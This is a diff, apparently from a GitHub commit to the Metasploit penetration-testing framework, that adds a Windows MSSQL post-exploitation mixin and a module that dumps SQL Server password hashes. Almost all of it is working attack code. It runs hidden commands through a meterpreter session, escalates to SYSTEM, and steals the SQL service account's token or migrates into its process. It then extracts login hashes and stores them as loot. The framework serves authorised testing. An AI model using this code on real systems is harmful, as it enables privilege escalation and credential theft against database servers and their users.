sempervictus
diff --git a/‎lib/msf/core/post/windows/mssql.rb
Lines changed: 210 additions & 0 deletions b/‎lib/msf/core/post/windows/mssql.rb
Lines changed: 210 additions & 0 deletions
diff --git a/‎modules/post/windows/gather/credentials/mssql_local_hashdump.rb
Lines changed: 176 additions & 0 deletions b/‎modules/post/windows/gather/credentials/mssql_local_hashdump.rb
Lines changed: 176 additions & 0 deletions
@@ -0,0 +1,210 @@
+# -*- coding: binary -*-
+require 'msf/core/post/windows/services'
+require 'msf/core/post/windows/priv'
+require 'msf/core/exploit/mssql_commands'
+
+module Msf
+  class Post
+    module Windows
+      module MSSQL
+
+        # @return [String, nil] contains the identified SQL command line client
+        attr_accessor :sql_client
+
+        include Msf::Exploit::Remote::MSSQL_COMMANDS
+        include Msf::Post::Windows::Services
+        include Msf::Post::Windows::Priv
+
+        # Identifies the Windows Service matching the SQL Server instance name
+        #
+        # @param [String] instance the SQL Server instance name to locate
+        # @return [Hash, nil] the Windows Service instance
+        def check_for_sqlserver(instance = nil)
+          target_service = nil
+          each_service do |service|
+            if instance.to_s.strip.empty?
+              # Target default instance
+              if service[:display] =~ /SQL Server \(|^MSSQLSERVER|^MSSQL\$/i &&
+                 service[:display] !~ /OLAPService|ADHelper/i &&
+                 service[:pid].to_i > 0
+
+                target_service = service
+                break
+              end
+            else
+              if (
+                  service[:display].downcase.include?("SQL Server (#{instance}".downcase) || #2k8
+                  service[:display].downcase.include?("MSSQL$#{instance}".downcase) || #2k
+                  service[:display].downcase.include?("MSSQLServer#{instance}".downcase) || #2k5
+                  service[:display].downcase == instance.downcase # If the user gets very specific
+                 ) &&
+                 service[:display] !~ /OLAPService|ADHelper/i &&
+                 service[:pid].to_i > 0
+                target_service = service
+                break
+              end
+            end
+          end
+
+          if target_service
+            target_service.merge!(service_info(target_service[:name]))
+          end
+
+          target_service
+        end
+
+        # Identifies a valid SQL Server command line client on the host and sets
+        # @sql_client
+        #
+        # @see #sql_client
+        # @return [String, nil] the SQL command line client
+        def get_sql_client
+          client = nil
+
+          if check_sqlcmd
+            client = 'sqlcmd'
+          elsif check_osql
+            client = 'osql'
+          end
+
+          @sql_client = client
+          client
+        end
+
+        # Attempts to run the osql command line tool
+        #
+        # @return [Boolean] true if osql is present
+        def check_osql
+          result = run_cmd('osql -?')
+          result =~ /(SQL Server Command Line Tool)|(usage: osql)/i
+        end
+
+        # Attempts to run the sqlcmd command line tool
+        #
+        # @return [Boolean] true if sqlcmd is present
+        def check_sqlcmd
+          result = run_cmd('sqlcmd -?')
+          result =~ /SQL Server Command Line Tool/i
+        end
+
+        # Runs a SQL query using the identified command line tool
+        #
+        # @param [String] query the query to execute
+        # @param [String] instance the SQL instance to target
+        # @param [String] server the SQL server to target
+        # @return [String] the result of query
+        def run_sql(query, instance = nil, server = '.')
+          target = server
+          if instance && instance.downcase != 'mssqlserver'
+            target = "#{server}\\#{instance}"
+          end
+          cmd = "#{@sql_client} -E -S #{target} -Q \"#{query}\" -h-1 -w 200"
+          vprint_status(cmd)
+          run_cmd(cmd)
+        end
+
+        # Executes a hidden command
+        #
+        # @param [String] cmd the command line to execute
+        # @param [Boolean] token use the current thread token
+        # @return [String] the results from the command
+        #
+        # @note This may fail as SYSTEM if the current process
+        #  doesn't have sufficient privileges to duplicate a token,
+        #  e.g. SeAssignPrimaryToken
+        def run_cmd(cmd, token = true)
+          opts = { 'Hidden' => true, 'Channelized' => true, 'UseThreadToken' => token }
+          process = session.sys.process.execute("cmd.exe /c #{cmd}", nil, opts)
+          res = ""
+          while (d = process.channel.read)
+            break if d == ""
+            res << d
+          end
+          process.channel.close
+          process.close
+
+          res
+        end
+
+        # Attempts to impersonate the user of the supplied service
+        # If the process has the appropriate privileges it will attempt to
+        # steal a token to impersonate, otherwise it will attempt to migrate
+        # into the service process.
+        #
+        # @note This may cause the meterpreter session to migrate!
+        #
+        # @param [Hash] service the service to target
+        # @return [Boolean] true if impersonated successfully
+        def impersonate_sql_user(service)
+          return false if service.nil? || service[:pid].nil? || service[:pid] <= 0
+
+          pid = service[:pid]
+          vprint_status("Current user: #{session.sys.config.getuid}")
+          current_privs = client.sys.config.getprivs
+          if current_privs.include?('SeImpersonatePrivilege') ||
+             current_privs.include?('SeTcbPrivilege') ||
+             current_privs.include?('SeAssignPrimaryTokenPrivilege')
+            username = nil
+            session.sys.process.each_process do |process|
+              if process['pid'] == pid
+                username = process['user']
+                break
+              end
+            end
+
+            return false unless username
+
+            session.core.use('incognito') unless session.incognito
+            vprint_status("Attemping to impersonate user: #{username}")
+            res = session.incognito.incognito_impersonate_token(username)
+
+            if res =~ /Successfully/i
+              print_good("Impersonated user: #{username}")
+              return true
+            else
+              return false
+            end
+          else
+            # Attempt to migrate to target sqlservr.exe process
+            # Migrating works, but I can't rev2self after its complete
+            print_warning("No SeImpersonatePrivilege, attempting to migrate to process #{pid}...")
+            begin
+              session.core.migrate(pid)
+            rescue Rex::RuntimeError => e
+              print_error(e.to_s)
+              return false
+            end
+
+            vprint_status("Current user: #{session.sys.config.getuid}")
+            print_good("Successfully migrated to sqlservr.exe process #{pid}")
+          end
+
+          true
+        end
+
+        # Attempts to escalate the meterpreter session to SYSTEM
+        #
+        # @return [Boolean] true if escalated successfully or user is already SYSTEM
+        def get_system
+          print_status("Checking if user is SYSTEM...")
+
+          if is_system?
+            print_good("User is SYSTEM")
+            return true
+          else
+            # Attempt to get LocalSystem privileges
+            print_warning("Attempting to get SYSTEM privileges...")
+            system_status = session.priv.getsystem
+            if system_status && system_status.first
+              print_good("Success, user is now SYSTEM")
+              return true
+            else
+              print_error("Unable to obtained SYSTEM privileges")
+              return false
+            end
+          end
+        end
+      end # MSSQL
+    end # Windows
+  end # Post
+end # Msf
@@ -0,0 +1,176 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/auxiliary/report'
+require 'msf/core/post/windows/mssql'
+
+
+class Metasploit3 < Msf::Post
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::MSSQL
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Windows Gather Local SQL Server Hash Dump',
+        'Description'   => %q{ This module extracts the usernames and password
+        hashes from a MSSQL server and stores them in the loot using the
+        same technique in mssql_local_auth_bypass (Credits: Scott Sutherland)
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Mike Manzotti <mike.manzotti[at]dionach.com>'],
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+      ))
+
+    register_options(
+      [
+        OptString.new('INSTANCE',  [false, 'Name of target SQL Server instance', nil])
+      ], self.class)
+  end
+
+  def run
+    # Set instance name (if specified)
+    instance = datastore['INSTANCE'].to_s
+
+    # Display target
+    print_status("Running module against #{sysinfo['Computer']}")
+
+    # Identify available native SQL client
+    get_sql_client
+    fail_with(Exploit::Failure::Unknown, 'Unable to identify a SQL client') unless @sql_client
+
+    # Get LocalSystem privileges
+    system_status = get_system
+    fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status
+
+    begin
+      service = check_for_sqlserver(instance)
+      fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service
+
+      print_status("Identified service '#{service[:display]}', PID: #{service[:pid]}")
+      instance_name = service[:display].gsub('SQL Server (','').gsub(')','').lstrip.rstrip
+
+      begin
+        get_sql_hash(instance_name)
+      rescue RuntimeError
+        # Attempt to impersonate sql server service account (for sql server 2012)
+        if impersonate_sql_user(service)
+          get_sql_hash(instance_name)
+        end
+      end
+    ensure
+      # return to original priv context
+      session.sys.config.revert_to_self
+    end
+  end
+
+  def get_sql_version(instance_name)
+    vprint_status("Attempting to get version...")
+
+    query = mssql_sql_info
+
+    get_version_result = run_sql(query, instance_name)
+
+    # Parse Data
+    get_version_array = get_version_result.split("\n")
+    version_year = get_version_array.first.strip.slice(/\d\d\d\d/)
+    if version_year
+      vprint_status("MSSQL version found: #{version_year}")
+      return version_year
+    else
+      vprint_error("MSSQL version not found")
+    end
+  end
+
+  def get_sql_hash(instance_name)
+    version_year = get_sql_version(instance_name)
+
+    case version_year
+    when "2000"
+      hash_type = "mssql"
+      query = mssql_2k_password_hashes
+    when "2005", "2008"
+      hash_type = "mssql05"
+      query = mssql_2k5_password_hashes
+    when "2012", "2014"
+      hash_type = "mssql12"
+      query = mssql_2k5_password_hashes
+    else
+      fail_with(Exploit::Failure::Unknown, "Unable to determine MSSQL Version")
+    end
+
+    print_status("Attempting to get password hashes...")
+
+    get_hash_result = run_sql(query, instance_name)
+
+    if get_hash_result.include?('0x')
+      # Parse Data
+      hash_array = get_hash_result.split("\r\n").grep(/0x/)
+
+      store_hashes(hash_array, hash_type)
+    else
+      fail_with(Exploit::Failure::Unknown, "Unable to retrieve hashes")
+    end
+  end
+
+  def store_hashes(hash_array, hash_type)
+    # Save data
+    loot_hashes = ""
+    hash_array.each do |row|
+      user, hash = row.strip.split
+
+      service_data = {
+        address: rhost,
+        port: rport,
+        service_name: 'mssql',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+      }
+
+      # Initialize Metasploit::Credential::Core object
+      credential_data = {
+        post_reference_name: refname,
+        origin_type: :session,
+        private_type: :nonreplayable_hash,
+        private_data: hash,
+        username: user,
+        session_id: session_db_id,
+        jtr_format: hash_type,
+        workspace_id: myworkspace_id
+      }
+
+      credential_data.merge!(service_data)
+
+      # Create the Metasploit::Credential::Core object
+      credential_core = create_credential(credential_data)
+
+      # Assemble the options hash for creating the Metasploit::Credential::Login object
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      # Merge in the service data and create our Login
+      login_data.merge!(service_data)
+      create_credential_login(login_data)
+
+      print_line("#{user}:#{hash}")
+
+      loot_hashes << "#{user}:#{hash}\n"
+    end
+
+    unless loot_hashes.empty?
+        # Store MSSQL password hash as loot
+        loot_path = store_loot('mssql.hash', 'text/plain', session, loot_hashes, 'mssql_hashdump.txt', 'MSSQL Password Hash')
+        print_good("MSSQL password hash saved in: #{loot_path}")
+        return true
+    else
+        return false
+    end
+  end
+
+end